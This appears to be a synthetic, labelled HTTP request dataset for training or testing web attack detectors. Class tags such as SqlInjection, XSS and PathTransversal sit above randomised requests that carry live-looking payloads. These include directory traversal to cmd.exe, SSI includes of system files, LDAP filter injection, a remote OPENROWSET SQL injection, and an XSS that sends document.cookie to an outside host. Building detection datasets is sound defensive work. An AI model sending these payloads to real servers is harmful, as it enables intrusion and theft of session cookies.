Client-ip: 218.44.126.244
Cookie: lkahhhh=rRnOe;orn5neinaseaAL=71100229;4Gmeta7h6pSAqou=3
Cookie2: $Version="408"
Date: Mon, 04 Jan 10 23:08:15 UTC
ETag: W/"ZXEXElr@0LpV3YJGdbm"
Expect: ytnux=thiRx
From: hwhheI@8isu.ch
If-Modified-Since: Fri, 10 Aug 07 07:03:30 CET
If-Unmodified-Since: Thu, 17 Jan 08 10:41:55 CET
If-Match: "gzENTIClic6iwRMewjm"
If-None-Match: *
If-Range: Mon, 11 Aug 08 07:31:05 UTC
Max-Forwards: 167
MIME-Version: 8.5
Pragma: xRv7='Gamw'
Proxy-Authorization: dgDa4v rdekp=aenneN
Authorization: Basic aW9jZTllOm5pbnlm
Range: 82059-
Referer: /4ettOe.sh
TE: gzip,trailers,deflate;q=0.4
Trailer: User-Agent
User-Agent: Mozilla/5.6 (Windows; U; Windows NT 5.1; or-Pe; rv:6.5.6) Gecko/38600752
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 7179x1026
Via: HTTP/3.5 www.teeer.shtml, FTP/6.2 www.ucrou.js, FTP/1.1 24.6.237.44
Transfer-Encoding: gzip
Upgrade: eet/8.2, womym/1.9, Orius/4.0, orvtl/1.7, sae7/5.2
Warning: 864 www.eeeoa.css "hlrre9anouesreagre4w" 
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 913755
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41797
Start - Id: 45656
class: PathTransversal
GET /Xaoaebntw/nTgmdpdS.QV4-fmfEyr/chuYXZQgs/UD5im_A66wq-Sk/atoGIOcLor5/8@.shtml?inUYzJbodyOZ=nesnppNd5%22%26uchaving&A4ea3n=snlEtmr-ti&itrsrsobsdn=7648980&rcsohu3e=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Filel%2Fmataverive%2Fmealntte%2Fta.bin&eO=02&D.M1=naS-yCHU&oEsoe9t=800407&op=o1%7Eat%3D%7Eperls%3F&iA4i7enaOhNi=lt%3D&ey=376&uudiR2csEei4x=ot0oeagbls8Hn9lo&naen=1742350583&zosmoiFftY=38&NloE=rs5iriEUJWI&dhsh9tiOfts=87 HTTP/1.1
Host: 16.83.228.94
Connection: keep-alive
Accept: video/*;q=0.4, video/*
Accept-Charset: x-mac-korean, cp-950
Accept-Encoding: *;q=0.2
Accept-Language: ero0-gne, ci-rios;q=0.5
Cache-Control: only-if-cached
Client-ip: 37.166.87.242
Cookie: cactibeioyynkpf=9408973;tihIe=92979321
Cookie2: $Version="46"
Date: Tue, 20 Feb 07 23:12:46 CET
ETag: W/"m.6STWsqpMYQfO5"
Expect: 100-continue
From: waaAi@m8ebbshnen.org
If-Modified-Since: Wed, 03 Mar 04 19:06:46 GMT
If-Unmodified-Since: Fri, 24 Dec 04 16:52:50 GMT
If-Match: "w6At@Pqt6aQd3CsN6"
If-None-Match: *
If-Range: "PAA3Ys3l0qu2BAXi"
Max-Forwards: 81
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: NTLM V2FscmdtaW9sb2FkYWFoZ05FcnNlbkhqYXJwTG8zakEz
Authorization: Digest username="noEj"
Range: -32,-46611
Referer: /seenotn.txt
TE: trailers,chunked;q=0.0
Trailer: Cache-Control
User-Agent: m7telysN4h (u7VTt24e2; tlKwUQu@rG; iYPU8_; xFk7Sn)
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 822x7787
Via: 1.5 17.219.242.139, 3.7 250.146.24.106, FTP/1.9 107.123.76.203
Transfer-Encoding: deflate
Upgrade: xEsdx/9.1, igRd/3.6, uactmt/9.2, dwr7p/4.6
Warning: 878 36.126.187.244:5468 "Nwnmte1bhOIhe" 
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 4318148965798
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45656
Start - Id: 40899
class: SSI
GET /d8atnftDorioobiayqO/m5n/eG4ri_4/snaooruKsSsniE.css?utut=r+g&syEa=%3C%21--++%23odbc+++statement++++%3D++++%22select+++thtivp%2C+++li%2C++++ptta9at++from++ssooo+++++order+++by++9%2C+++706%2C++0%22+--%3E HTTP/1.0
Host: www.9gt1tcs2.org
Connection: close
Accept: text/plain, text/html, application/*
Accept-Charset: macintosh, iso-8859-3, iso-8859-15, iso-2022-jp, iso-2022-kr
Accept-Encoding: 
Accept-Language: bmlp-eeil, 8eau-mewabe;q=0.7, v-irrdeil;q=0.3, ssui-iewusnid
Cache-Control: t=Edac
Client-ip: 215.13.110.135
Cookie: X8Qqu94=aitVou4Lum;esttehsee=uhpmobhmtacnph-;FriyviAe6lr=di.au
Cookie2: $Version="18"
Date: Wed, 14 Sep 05 05:13:20 UTC
ETag: "GRCzclJasRqBalTu"
Expect: 100-continue
From: ditrnsd@mzoyfsuain.uk
If-Modified-Since: Fri, 07 Aug 09 04:00:05 GMT
If-Unmodified-Since: Tue, 25 Jan 05 12:54:31 UTC
If-Match: "JFFjtQ3dMZUbi3yyi"
If-None-Match: *
If-Range: Sun, 02 Sep 07 11:22:26 GMT
Max-Forwards: 848
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: NTLM b3Bpc295VHpvc2syNGxlZkV3aGlhbmVuZTVlYmh0b3RzenI=
Authorization: Basic aXJuREw6dHdsRHJh
Range: 776-,-33080
Referer: /beoPge/e3bt.tiff
TE: gzip,trailers,trailers
Trailer: Range
User-Agent: Mozilla/5.9 (X11; U; Linux i586 5.3; ay-nt; rv:2.4.9) Gecko/09987141
UA-CPU: StrongARM
UA-Disp: 8926,1457,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 206x873
Via: HTTP/6.6 100.7.237.22:880
Transfer-Encoding: identity
Upgrade: fmoaA/7.1, wyse3a/5.5, tlee/2.8, eejrdw/0.2
Warning: 603 www.e2tt.jpg:323 "reecdaeesselriRoe" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 821981271525659
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40899
Start - Id: 37528
class: LdapInjection
POST /lxeoA@_Gy.mjD/hngEnmofntiO/lNcY1hiqt_ut.LMG8/smleeaOm1e1tedgta/2QeZS8pppuji/48Tz0GF-ICyzRkw3Qh/oiy/gKvVp2/.s/aoh4heh9.swf? HTTP/1.1
Content-Length: 192
Content-Language: te,ozepens
Content-Encoding: compress
Content-Location: http://yaatmOt.it/afte/rygs7tR/Phnceya/ooeocph.jsp
Content-MD5: bzBFaW5Pd25hc2FkbnNnbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Nov 06 16:11:07 UTC
Last-Modified: Mon, 17 Mar 08 15:28:20 GMT
Host: 48.5.79.254:5152
Connection: close
Accept: video/quicktime;q=0.5, video/mpeg
Accept-Charset: ks_c_5601-1987;q=0.1, koi8-r;q=0.7, isiri-3342;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 133.128.23.213
Cookie: r73SokHQ8r=5;tehiy8hEtqe= yg ;a9s8tr7Lnnceq=6
Cookie2: $Version="192"
Date: Wed, 08 Feb 06 12:22:38 CET
ETag: "eRBcLEPpUSsRmtpuW-pP"
Expect: 100-continue
From: nIt1h@rvrs.org
If-Modified-Since: Thu, 23 Sep 04 03:54:05 UTC
If-Unmodified-Since: Sun, 03 Aug 08 11:02:24 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 06 Jan 04 11:55:55 CET
Max-Forwards: 9
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: rertml hneO5=eocht
Authorization: Basic cWFsYzpvaHZFdA==
Range: 0516-7855,069180-,334-
Referer: /nnilHtae/w5te/wh0tRal/5ee7/tniy.sh
TE: trailers
Trailer: Expect
User-Agent: Mozilla/4.0 (X11; U; Open BSD i386 6.1; 1r-Nn; rv:8.2.3) Gecko/90038750
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 523x786
Via: 5.0 www.ssres.js, lSa6/2.2 242.132.221.129, dxwrlr/0.6 227.190.149.12
Transfer-Encoding: gzip
Upgrade: 6ciYs/4.5, tUt/0.1, hmo/8.6, HPozai/2.7, 4rIvIy/9.5
Warning: 162 www.befnhlc.css "osea53nrTepho" 
X-Serial-Number: 749091
----: ----------------
~~~~~: ~~~~~~~~~~~~

hanInoa=223&pem=uiae)(&(objectClass= e9Aa*)&position@wzlGBf= &mea33nWlca=T&noie7aa0=ltrw1&fdot=t;de home~t$&oWemohTa8eMTiht=rraeb?eud;re&n1enpej=nmeO&ktieinooeea8r=4raoiv

End - Id: 37528
Start - Id: 36854
class: LdapInjection
GET /dENIjSj6zn/5oI8E5j.B7jE_/rQO25hKUf0x.d9./ma/EcatPRStRQ5l28/pC32i/VVCZ7_Bb.htm?NoiLal1=855643&ipT=L+suunt4Tse&welhog9wey5s=m4bdEW8Ue84Z&ahMtBs=ot6&s4gml=ch+c&ete4ay8ns0vd3it=%3E&we=1&fihRorndcos=34255&jEtsdahrNi=theclmrs&wnsh=dqchildiIBcti&3bu3raja=qe%3Faa&usieiaNaep=ealslmoov HTTP/1.1
Host: www.ldtmifAP.org
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: isiri-3342, x-mac-arabic, iso-8859-6;q=0.0, windows-1252, windows-1251
Accept-Encoding: )   ( |  (DOscE=eucs*)
Accept-Language: 5gdeo-h;q=0.6
Cache-Control: only-if-cached
Cookie: xZiNwhereKSZnull=414118;gtltlin=wu;gb2seyStcm1=e0
Cookie2: $Version="869"
Date: Thu, 07 Aug 08 11:01:13 UTC
ETag: W/"FaFmDxnZfXPqO-EeP"
From: lvelladt@3trbvtitH.net
If-Modified-Since: Fri, 15 Oct 04 19:25:26 GMT
If-Unmodified-Since: Sun, 22 Mar 09 14:35:20 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 278
MIME-Version: 9.2
Pragma: 0whilhi=tb
Authorization: Basic cW9iYzh5eWU6RWVpdW8=
Range: -0235,09-
Referer: /vPegrbtt/ottxeNa/0r5ecef/l6rh7/f3eEIa.mp3
User-Agent: 5mFO.t5 http://www.Gjkm.org
UA-Color: color32
UA-Pixels: 6170x381
Via: 0enwi/6.3 69.33.121.221:3
Transfer-Encoding: identity
Warning: 449 www.1trt.gif:081 "UlredsomtoT1g" "Sat, 20 Feb 10 20:48:04 UTC"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36854
Start - Id: 36536
class: OsCommanding
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 43.176.202.168
Connection: close
Accept: image/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ngss-7C, nraa-Na;q=0.4, nebTkl-ooO;q=0.3, se1nmdFo-tegt;q=0.0
Cache-Control: no-cache
Client-ip: 213.233.54.110
Cookie: els=objectdR/cgc$Tllrdg|include;Ttelnet>;kalpsXEEfa=sjadr1acthn;otcoEf=iCmY
Cookie2: $Version="222"
Date: Tue, 10 Aug 04 02:40:56 CET
ETag: "@ruI.MWKdtelCCfg"
Expect: 9nww
From: rteeiu@new9Eetlcd.org
If-Modified-Since: Sun, 27 Aug 06 19:58:50 GMT
If-Unmodified-Since: Fri, 21 Nov 08 17:48:25 CET
If-Match: "99DCnEFU1GYMcD9k"
If-None-Match: "HWXspFdFV_utEpAEBu"
If-Range: *
Max-Forwards: 9
MIME-Version: 3.0
Pragma: arhDa=trSgse
Proxy-Authorization: Basic MnNlMG9hb1U6endvb2N0cW8=
Authorization: ebie lqim0=ntd5
Range: 01232-,419-,638-
Referer: http://oaha4o.it/rcescEO.mpeg
TE: trailers,deflate,trailers
Trailer: Via
User-Agent: Mozilla/8.6 (Machintosh; U; PPC 3.1; ws-Pm; rv:7.3.1) Gecko/07713576
UA-CPU: x86
UA-Disp: 0316,285,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 547x5195
Via: 1.7 184.212.133.237
Transfer-Encoding: compress
Upgrade: ildtt/8.0
Warning: 375 www.gfsleIzg.jpg:66 "hjNhnn62m" 
X-Forwarded-For: 149.92.182.203
X-Serial-Number: 55534835625911216707
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36536
Start - Id: 40526
class: SSI
GET /s6eaah/eCvBw8P_mRhdq4eMvOm/oedAnOucu6dclfb/1v/i0ZaJg/14ejYJcj-6x/Q0o/d7/KGRRNV7insert/pX9Z4kgZ2gUu03RB.asp?Btostejhg6U=%3C%21--+%23include++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22--%3E&iezMss=1ae5bvTl94d+3%5Bw&.IGoptqR@eCxp_P=84 HTTP/1.1
Host: www.dwist.gov
Connection: hNpv7s
Accept: */*;q=0.3
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=9939
Client-ip: 109.86.93.38
Cookie: iiNeu5Smztn=409;sfhesp0oau=955532
Cookie2: $Version="51"
Date: Tue, 24 Jan 06 16:26:53 UTC
ETag: "G5thXp8xs5cDE.veI"
Expect: 100-continue
From: OeTsa@undhtsdpd.it
If-Modified-Since: Wed, 29 Oct 08 04:15:30 CET
If-Unmodified-Since: Tue, 25 Jul 06 06:04:29 GMT
If-Match: "@ONyKZ6B4YJ@dn3o1"
If-None-Match: *
If-Range: *
Max-Forwards: 217
MIME-Version: 8.6
Pragma: eawgecu=ect
Proxy-Authorization: dler dcyii=syes
Authorization: Basic Y2g0ZWJFaHU6d2FrNnVpZg==
Range: -112429,931-60
Referer: http://www.terthdri.be/Z037Ys/rnyl/oieicr/hUdhov/tdo3o.tiff
TE: deflate;q=0.9,gzip;q=0.4,trailers
Trailer: Connection
User-Agent: Mozilla/6.3 (X11; U; SunOS sun4u 5.3; tk-ae; rv:4.7.9) Gecko/31381278
UA-CPU: Sparc
UA-Disp: 2836,7389,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3342x1111
Via: HTTP/9.4 223.208.124.154
Transfer-Encoding: identity
Upgrade: erf2/5.5, agh/2.9, dtoitg/7.9
Warning: 855 www.ece5Rtd.shtml "aStprsanaUieimSniow" 
X-Forwarded-For: 74.209.53.98
X-Serial-Number: 61054598804485092045
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40526
Start - Id: 42516
class: SqlInjection
GET /evor/9o/cCXtcJ1Rly0d/drmsbtdnweerqexm.mspx?QEoIenA=kied&Ae1nlnHoattr9=nUSL%40jA%405E&tTc54ssge7E2rq=82836383&sea=%3B++select+*++++from++++OPENROWSET%28+%27SQLoledb%27%2C%27uid%3Daoeecsm%3Bpwd%3DsAoae%3BNetwork%3DDBMSSOCN%3BAddress%3D151.32.206.188%2C56912%3B%27%2C%27select++++*+++from+++++iummnrawr%27+++%29 HTTP/1.1
Host: 49.38.205.26
Connection: keep-alive
Accept: application/*, image/gif;q=0.2
Accept-Charset: gb2312;q=0.7, x-mac-roman, x-mac-icelandic;q=0.1, windows-1253
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: min-fresh=44347
Client-ip: 17.1.105.246
Cookie: aw3Nlgk=tiam;tnperlUt=hjdEX7Tk;daiRtn0ocpeuYar=01;ee=W
Cookie2: $Version="7"
Date: Thu, 15 Jul 04 17:36:59 CET
ETag: "QTJNs90GRqYP0w9uxk2"
Expect: 100-continue
From: be38Ged@6e9snto.ch
If-Modified-Since: Mon, 15 Dec 08 04:40:03 UTC
If-Unmodified-Since: Sun, 02 Sep 07 04:25:35 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 27 Jun 04 18:12:58 UTC
Max-Forwards: 787
MIME-Version: 6.8
Pragma: 5b=lEen
Proxy-Authorization: NTLM d2hhcnZ5dHVyZnpiYUF6YW9oY25jVGJxdWxSdGN0YWVpcDd0
Authorization: NTLM ejBvcXRkeGNyZWV0aXV1QWl5YWNhdGZydW5zcnU4b3IxYW1reXVtTm4=
Range: 430-,2-8084
Referer: /nnjny5/agLa1/02ncs/luslr/taoeh.html
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: Mozilla/1.4 (X11; U; SunOS sun4u 8.0; nc-el; rv:8.9.2) Gecko/96528778
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: 0le/1.5 109.11.107.18
Transfer-Encoding: f2s3n
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 860 252.84.118.119 "gymdt4aeaea4ehhX" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 171208894897748
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42516
Start - Id: 44925
class: PathTransversal
GET /beao/3VFnYj/8QincludeciBU/Jtloe/eaZyP2vPYt4v@gZ/xede/osla7qoyeolteer.tiff?e6=3333773618&6sotp2cslq8p=etnpo8ae3r&91RupdateiR6_=ee2ewherernh&k.1Ua3HZw=%7Eau8ia&ii7dhO4=w%2Fxml&rltE=.%2F..%2F.%2F..%2F HTTP/1.1
Host: 182.60.3.168
Connection: 0ArHeyee
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: compress, identity, gzip;q=0.2
Accept-Language: vSl-tfE5T;q=0.6
Cache-Control: max-stale=3694
Client-ip: 156.228.249.233
Cookie: ueoealeAaa=efewwhct3Iojnnoe7e;c0ys=044840941
Cookie2: $Version="10"
Date: Sat, 20 Oct 07 20:55:47 GMT
ETag: "s3X2xyY4nbloQUM2pt6"
Expect: 100-continue
From: erlpd29@hbwsenumTc.de
If-Modified-Since: Wed, 11 Aug 04 15:21:35 UTC
If-Unmodified-Since: Sun, 01 Feb 04 21:16:15 CET
If-Match: "bYmRxm3JoHIIpH8Cv3"
If-None-Match: *
If-Range: "xFII8BF3w7Nw57gEI4"
Max-Forwards: 8599
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest response="98F2FadAed0C8DFfeDEa1A54Dbbba32e"
Authorization: Basic ZU5pcDpibmVzcA==
Range: 50635-77
Referer: /boiE/3yEs3w/kn0o6ina/bhLta/hrclo.jpeg
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/5.1 (X11; U; Open BSD i586 1.3; 4w-Sk; rv:2.8.8) Gecko/69423999
UA-CPU: StrongARM
UA-Disp: 8119,252,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0076x7912
Via: 5.9 www.hhequr.tiff, 4.9 126.126.41.176, 7.1 www.ststy.tiff
Transfer-Encoding: identity
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 627 www.luad.js "7atl" "Sun, 01 Jul 07 05:55:47 CET"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44925
Start - Id: 38728
class: LdapInjection
GET /dlafobatI19zi/h4aa8p/csm1.zsaO9U/odb/dOO-XrQ5scMyuJpYg/ssQW-r5S/@LKRxgtp/gSgRnEPL5cOMwhere85.htm?raae=90&sbuqhlt=%24+mautoexecdivs4ss&nzduc1=l%40Ah&as5blorn1orl2r=abiK91Jt&se=hlSuD%40HfeS&o9moofEaoinesln=hhteAd&8ist9hn=0225%29%28%26%28objectClass%3D3ea%29%28%7C%28sn++++%3D++++ri52%29%28cn%3Dc++J*%29%29&yeeu3rtranu=5575608712&eyelcLpertd=9007203&LMPb=manrtntffezH&5la=dpt27%5Cue&r4eorT=969950186&tIRdhgiac=21863346&_Mycmdc=awote HTTP/1.0
Host: www.nsi4wee85e.de
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: windows-1254;q=0.1
Accept-Encoding: *
Accept-Language: kooyse-Qf2, sstas-qaTA;q=0.9, ioebeu0s-siNruCej, e-ae8tcnl6
Cache-Control: no-transform
Client-ip: 132.36.253.148
Cookie: 4a7n=oenneaAnhNi ;2hyrc=idseeztir0Hwzo7n2;c8Xsm=s-gb613ALsPE;swvc4fepeR=826927731
Cookie2: $Version="15"
Date: Thu, 21 Jul 05 08:37:53 CET
ETag: "QB_Ra65Zn9G0M2Xodqta"
Expect: 100-continue
From: siyWs@6ac5m.it
If-Modified-Since: Tue, 06 Nov 07 15:34:13 GMT
If-Unmodified-Since: Sun, 22 Feb 04 18:08:18 GMT
If-Match: "AEFRn_BfxVQKRWtDbZI"
If-None-Match: "a8BfFov.wQgNTYi25UOM"
If-Range: Fri, 21 Nov 08 21:04:47 UTC
Max-Forwards: 9
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: ztgn ZDrc=dnonaeea
Authorization: NTLM dGNucnJ1NG5scmkzZG5uSGF0bnRldHJBbzh6ZFJkc3llYm1lZXQydw==
Range: 5873-
Referer: http://www.elcXne.de/iEsa/bieLosi/rauEt0/as5ot/amedslt.pl
TE: gzip;q=0.9,deflate
Trailer: Authorization
User-Agent: Mozilla/2.8 (compatible; MSIE 8.3; Linux i586; teecii; 0Eh3mrdnr; aosdwi)
UA-CPU: 68000
UA-Disp: 281,271,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 094x3377
Via: 7.3 79.47.162.18
Transfer-Encoding: deflate
Upgrade: u3thye/4.0, rfee/2.0
Warning: 710 168.112.195.187 "tiseidiPedr0p" 
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 9623929231102541255
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38728
Start - Id: 45277
class: PathTransversal
GET /yhwslnhX/ds5iyy7cmnNierocTelm/f_cmd/rEIns/-39U/sPRy.jpg?Sc_RFcat=m6atRkieidecfh5s&onwvp4olwgsf7ac=rlocationke+t&teeucsdEiarPykb=5&moboo=unFSumlshutdowna&ran=e4&qeieAEhrnnniih=am6DS_Tf&te6mjnpsei=3TfF%40HQ HTTP/1.1
Host: 168.222.91.71
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-15;q=0.4, iso-10646-ucs-2, iso-8859-6, x-mac-arabic;q=0.7, shift_jis;q=0.6
Accept-Encoding: identity, identity;q=0.5
Accept-Language: *
Cache-Control: no-store
Client-ip: 85.39.168.130
Cookie: eYsRssnmIos=eVJZP
Cookie2: $Version="3"
Date: Thu, 05 Feb 04 07:11:27 CET
ETag: W/"5gSeKfsmgTjNx@2z-Qa"
Expect: 100-continue
From: ra7rtweh@ttrsy.org
If-Modified-Since: Thu, 28 Jan 10 08:18:12 UTC
If-Unmodified-Since: Tue, 08 Mar 05 09:34:41 GMT
If-Match: *
If-None-Match: "w0n25l7sTrW7ocS"
If-Range: Thu, 09 Sep 04 17:20:51 CET
Max-Forwards: 9
MIME-Version: 1.6
Pragma: BErzei='54nscs'
Proxy-Authorization: Basic enRvTzphaXFu
Authorization: RQac if6voau=eekr
Range: 259-814,-6312
Referer: /otis/Sntseb/frwis/TIhrzrih/urstprz.css
TE: gzip;q=0.2
Trailer: Host
User-Agent: ..........................WINNTsystem.ini
UA-CPU: 68000
UA-Disp: 4571,953,16
UA-Pixels: 0624x6647
Via: mrc0g/7.9 114.119.0.234
Transfer-Encoding: compress
Upgrade: hau3E/8.8, 3q3eqe/2.3, eaxe4/7.9
Warning: 494 255.48.101.36:36380 "e28hr" 
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45277
Start - Id: 48007
class: XSS
GET /eegiofaszwQatrnlt/tv5i54.mdb?K5IMLchild=%3Cbody++onload+++%3D+%22%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.teveat.com%2Fcgi-bin%2Fchmadedeer.cgi%27%2Bdocument.cookie%29%3B%5D++++%22++%3E&edumeIdotwefhdu=rXEOOI&blAt=723 HTTP/1.0
Host: www.sale.fr
Connection: eReass
Accept: */*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.9, deflate;q=0.7, compress;q=0.0
Accept-Language: *
Cache-Control: no-cache
Client-ip: 192.143.189.93
Cookie: 2oaai=imniostnsem;dZho=61818406;oOeootRo=5yi0hxmlsmceo)n7; n;6p1qaLel=234;kmTfd=&Ep
Cookie2: $Version="40"
Date: Fri, 03 Oct 08 04:37:27 UTC
ETag: "wpRitPdByMlsrTEbXjXz"
Expect: btagiam=frsp
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Fri, 30 Apr 04 18:28:32 GMT
If-Unmodified-Since: Sat, 03 Mar 07 01:48:45 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 09 Sep 05 15:32:16 UTC
Max-Forwards: 212
MIME-Version: 8.3
Pragma: n8rue5e=rkie
Proxy-Authorization: NTLM NnJhc2lkbGhldzBvZWFkcDRlYW5zdWVuaWF0c0xuaGdnZXBob28=
Authorization: eeer LeSHrn=tgeiar
Range: 545-32,248-,104203-4203
Referer: http://www.hsscts.net/tjeladto/Iami/letYctAq/yaet/iredhgh.asmx
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/1.3 (Windows; U; Windows NT 8.5; dU-an; rv:7.5.8) Gecko/24976998
UA-CPU: PowerPC
UA-Disp: 212,5646,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 948x768
Via: 4.1 www.tHyoonno.shtml:128, 0.9 www.stTtfns.shtml
Transfer-Encoding: gzip
Upgrade: mtenw/7.3, ootl0/6.0, ncmojI/8.6
Warning: 867 196.240.170.127 "obax" "Mon, 11 Jul 05 01:16:42 UTC"
X-Forwarded-For: 186.104.154.65
X-Serial-Number: 698729021
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48007
Start - Id: 48182
class: XSS
POST /u-n_VwgetvCuusrl/@MaycWYGi2K8mZ/iRHLv3IyWof9Y1yP09/yUxSsN2.e/G@Hv/fue9oepao/QUkpyaccess_logcdC.mdb? HTTP/1.1
Content-Length: 10
Content-Language: uesi,aioEoah
Content-Encoding: identity
Content-Location: /iweoe.htm
Content-MD5: ZXRwbGh1aWlvbW5hdHVudA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 Aug 06 09:51:55 CET
Last-Modified: Fri, 11 Mar 05 24:11:03 GMT
Host: 220.108.9.72
Connection: keep-alive
Accept: video/*;q=0.3, application/*, video/*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: <xml    src = "   javascript: [alert   ('aouawi');]  " >
Cache-Control: no-cache
Client-ip: 49.115.14.28
Cookie: wee5aly4hle0=%t;thNnnfe9==o:xHeiG d;L8scrNF=n;at= raes|7WdZ-ns<;vH4tO6oe=63305583;pbadyRt2ciAml=p7N501Z
Cookie2: $Version="19"
Date: Fri, 30 Jan 04 01:50:19 UTC
ETag: "13Q28YBJBklXk8y"
Expect: 100-continue
From: umnoGes@ienl6i3a.biz
If-Modified-Since: Sun, 19 Jul 09 21:35:24 GMT
If-Unmodified-Since: Tue, 20 Jan 09 17:01:09 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 29 Nov 08 19:52:06 UTC
Max-Forwards: 84
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: snef otwda=wezessn
Authorization: NTLM bmlpdG50cmxkMGxudWhpdGx0dDNvb3RmM2Vvd2FuY2VjanNwa2VybW4=
Range: 57637-,977-
Referer: http://www.eAzeel.be/ohfZ/rgot.wav
TE: trailers
Trailer: Transfer-Encoding
User-Agent: tcl@9xoLrP http://www.dsho.uk
UA-CPU: Sparc
UA-Disp: 194,7872,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 615x877
Via: 4.0 www.6l6hiou.gif, 3.7 170.69.119.111, 7.9 12.24.134.127
Transfer-Encoding: identity
Upgrade: srri/9.4, f3wl9/8.3, Feenos/9.2
Warning: 505 20.155.179.30 "pllnsh" "Sat, 12 Dec 09 10:14:04 GMT"
X-Forwarded-For: 142.177.244.22
X-Serial-Number: 4514331
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dcaIesty=3

End - Id: 48182
Start - Id: 36966
class: LdapInjection
GET /zv7WQ-MvtnWD3mMGE@7/tRw/AH/baaEii3ftdept/oseinnelaoAu.asmx?teeEswet9=d+oencscript+3tdtei&ahaeho=149207&olesea9=tah%29%28%7C+%28Ibyna%3D*%29&ro=c3io HTTP/1.1
Host: 82.166.5.61
Connection: gtceeelW
Accept: application/*;q=0.7, video/*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.2
Accept-Language: txY2ieh4-nciNmlog;q=0.2, s-g, 1onla-7t1bEiw;q=0.7
Cache-Control: no-store
Client-ip: 248.80.57.117
Cookie: ae7=wkxdDF6;deLrel5n5=oev>e e0t;orc2trag=nxM0Vnrn5;0xtelnet-@bJusr=uN;1a4i774=078535
Cookie2: $Version="3"
Date: Tue, 22 Sep 09 14:50:09 CET
ETag: "-VzvVFgTnT9xXlM"
Expect: 100-continue
From: ooeh@nqieoausen.gov
If-Modified-Since: Sat, 27 May 06 05:43:22 UTC
If-Unmodified-Since: Sat, 13 Jun 09 24:54:14 CET
If-Match: "taumDye8bE0mHOEV"
If-None-Match: "b81RCllo4JeISay"
If-Range: "OVMr9-OzY7J9JDNuycr"
Max-Forwards: 27
MIME-Version: 0.9
